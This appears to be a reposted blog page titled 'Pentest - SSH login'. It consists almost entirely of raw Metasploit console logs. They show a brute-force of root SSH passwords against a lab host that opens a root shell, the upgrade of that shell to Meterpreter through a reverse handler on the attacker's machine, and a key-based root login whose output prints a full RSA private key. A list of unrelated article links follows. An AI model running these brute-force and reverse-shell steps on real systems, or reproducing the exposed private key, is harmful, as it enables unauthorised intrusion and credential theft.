Pentest - SSH login
来源:互联网 发布:sftp端口号 编辑:程序博客网 时间:2024/05/29 16:41
Username/Password Auth
msf auxiliary(ssh_login) > show options Module options (auxiliary/scanner/ssh/ssh_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /tmp/pass.txt no File containing passwords, one per line RHOSTS 192.168.1.103 yes The target address range or CIDR identifier RPORT 22222 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 2 yes The number of concurrent threads USERNAME root no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attemptsmsf auxiliary(ssh_login) > run [*] 192.168.1.103:22222 SSH - Starting bruteforce[-] 192.168.1.103:22222 SSH - Failed: 'root:pass'[-] 192.168.1.103:22222 SSH - Failed: 'root:pass123'[-] 192.168.1.103:22222 SSH - Failed: 'root:123456'[-] 192.168.1.103:22222 SSH - Failed: 'root:admin'[-] 192.168.1.103:22222 SSH - Failed: 'root:root'[+] 192.168.1.103:22222 SSH - Success: 'root:password' 'uid=0(root) gid=0(root) groups=0(root) Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 GNU/Linux '[*] Command shell session 1 opened (192.168.1.108:41477 -> 192.168.1.103:22222) at 2015-11-09 13:55:40 +0000[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedmsf auxiliary(ssh_login) > sessions -lActive sessions=============== Id Type Information Connection -- ---- ----------- ---------- 1 shell linux SSH root:password (192.168.1.103:22222) 192.168.1.108:41477 -> 192.168.1.103:22222 (192.168.1.103)msf auxiliary(ssh_login) > sessions -hUsage: sessions [options]Active session manipulation and interaction.OPTIONS: -K Terminate all sessions -c <opt> Run a command on the session given with -i, or all -h Help banner -i <opt> Interact with the supplied session ID -k <opt> Terminate sessions by session ID and/or range -l List all active sessions -q Quiet mode -r Reset the ring buffer for the session given with -i, or all -s <opt> Run a script on the session given with -i, or all -t <opt> Set a response timeout (default: 15) -u <opt> Upgrade a shell to a meterpreter session on many platforms -v List verbose fieldsMany options allow specifying session ranges using commas and dashes.For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6msf auxiliary(ssh_login) > sessions -u 1[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1][*] Upgrading session ID: 1[*] Starting exploit/multi/handler[*] Started reverse handler on 192.168.1.108:4433 [*] Starting the payload handler...[*] Transmitting intermediate stager for over-sized stage...(105 bytes)[*] Sending stage (1495598 bytes) to 192.168.1.103[*] Command stager progress: 100.00% (670/670 bytes)msf auxiliary(ssh_login) > [*] Meterpreter session 2 opened (192.168.1.108:4433 -> 192.168.1.103:57029) at 2015-11-09 13:56:32 +0000msf auxiliary(ssh_login) > sessions -lActive sessions=============== Id Type Information Connection -- ---- ----------- ---------- 1 shell linux SSH root:password (192.168.1.103:22222) 192.168.1.108:41477 -> 192.168.1.103:22222 (192.168.1.103) 2 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ kali 192.168.1.108:4433 -> 192.168.1.103:57029 (192.168.1.103)
Key Auth
msf auxiliary(ssh_login_pubkey) > show options Module options (auxiliary/scanner/ssh/ssh_login_pubkey): Name Current Setting Required Description ---- --------------- -------- ----------- BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list KEY_PATH /tmp/id_rsa yes Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will be skipped. RHOSTS 192.168.1.103 yes The target address range or CIDR identifier RPORT 22222 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME root no A specific username to authenticate as USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attemptsmsf auxiliary(ssh_login_pubkey) > run [*] 192.168.1.103:22222 SSH - Testing Cleartext Keys[*] 192.168.1.103:22222 SSH - Testing 1 keys from /tmp/id_rsa[+] 192.168.1.103:22222 SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----MIIEpAIBAAKCAQEAyJWSHJ90LGFbKraEt5QkozE8GmjfsQR1iOVPIwQuNmm8/ehOVPDWjz8H23BRXgLmsOoYAkgQe2fIUrgiBjUsgX4fhcPKO3PvgjjR8D86eES7DmlbPPCNF4LyMyAm3LkP3iSb5youhhFRLRevNvzq1jJlTuzi6nyY6i0pC5yWbRTJUjNUBk9ao6C4GnZzjlilQochRMrZWGcDkkeV154E1Leq0UtBl3INFBB4U5rH6tC34eEZ5BeuAMnkdEp2p/nYzJrbxg6ead6/bWGJLXqKaIi3YmDpASvvcer4cs2b5guPCpn6Hk8WsmrlnbWbpxh4lfJ4oPTlbglP5h0ScK+nMwIDAQABAoIBADH+zedieyNgtMeFrLjRLPycFf4DK9ZEZUNU3I++yAH6AwhKcdPMH76emEfCzBUhpfxsrMVMzwbjTFQJ3zkq4cf49sRxk6OT9xu/K9y09c7qWrFx4zLiRliY4+OIXQdg/SqCd3V71xLFmDUkFSEgkywGbafpdXm6yqZ70SI6ymeveKeYhg1Rcm5EC8ZrBqai6oZq1QJuWxpq0BIQzWzfTr/GD8o84NxZVDJF3I5XT7JKBshHLnXiaDTFMmWI0h0gNnga/qK27waMlY3EflgLMXF2faeG+S9Tc4GHtTLSeHRo+wph3V1+dynw9AUEud7MYU6bP5JtzKYqYf4WZA5MHSECgYEA6VGFQcA5Xirw/+ltaqKjesVaoYzICz/XsRObchsDlkF+duQOiPo6EJtE5LnJ5YEOudMC9FyBrLhGLnHgWVhJZkIALxIvhb0oUULh9Skqcyxjfh6DDcWLhsCF/3upyc3k3mw/LUSoo+OlY1PdI8qX6EIH9jSjBpgCbdKf0ybnwuMCgYEA3BVpOvnhpWcsZ31kSoNG8XQsLcQ2r64uNjF9jhtYCUFTQZ6FyCg1pH8IHqN0y8ICq0pHx3NK/35vYcb/wUlyXKCNn78dbW+tQrvWqj8vA/bEXqRpQx33J8fFP8M5ZYF9mVsXrnj1GGPrO1Og+dHncq1EssKedSlCexK/JSsHq3ECgYEAluQx2iQG9e+vjNHaAWzNbUjVJEV32k6fn9WeYl02JKaWsy0qeUva4YKJO6Mr/1FHxMXC02ZANwO137Ol9CI01f05QTfxo/yBZoxqtbK50WKTtazl9LIdWjiIcIH5fJm7ul0nPo94wQUooORL0CnltD+ABqpkBI+qgnwFAPnYSSECgYEAzbQ5egUq8dVAPK6Hudl/ypih3lkCICw2RzL0vokyPNxQ/Ak108I5eTm+lhyDQxtgMUepVXOeirVbV9GPJNMIUClEliYkVDBIihJVbyTFRfg0zJzxQelVJFplM9a94/EnOtpYhRvLQfPKXtYopLebk6T9i/O59ZoN6Ei6XfwdHBECgYBv47rIvFeZfABI8nmif6HCGuQQhGjvTmqw6U2OQ58Uh/j/8EOLQeYZ4zsKG+CiLDCdartBpnScurASl4PHx81u5kKL+ec49tuiv1zUruoLz8fCRbq65HF22YqgWuB17FScJFWydGtT1XC0xvzPVFGDaJ07YGqMrROwpejAQquKYw==-----END RSA PRIVATE KEY-----' 'uid=0(root) gid=0(root) groups=0(root) Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 GNU/Linux '[*] Command shell session 9 opened (192.168.1.108:34357 -> 192.168.1.103:22222) at 2015-11-09 16:23:04 +0000[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
0 0
- Pentest - SSH login
- ssh login without password
- SSH login without password
- SSH Automatic Login (转载)
- Putty SSH automatic login
- SSH & auto login
- SSH & auto login
- SSH login without password
- SSH login without password
- ssh login without passwd
- SSH login without password
- SSH login without password
- SSH login without password
- ssh need login password
- SSH login without password
- SSH Login Shell
- ssh key login
- SSH login without password
- V$STATNAME
- complete.cases筛选NA数据
- Linux动态加载库的使用方法
- Unity编辑时打左括号出现异常的问题
- 自己testkvo的代码心的(有一行代码要特别的注意)
- Pentest - SSH login
- 陈硕-应届生应聘程序员,简历上能写书单吗?最好有哪些信息?
- 黑马程序员——基础知识——多态
- 设计模式实例学习-策略模式
- 正则表达式基础
- Spring MVC使用@ResponseBody无法跳转到对应的jsp页面以及ie8下报错的解决方法
- hog+svm 行人检测
- 陈硕-Linux C++ 服务器端这条线怎么走?一年半能做出什么?
- 数据库的三级模式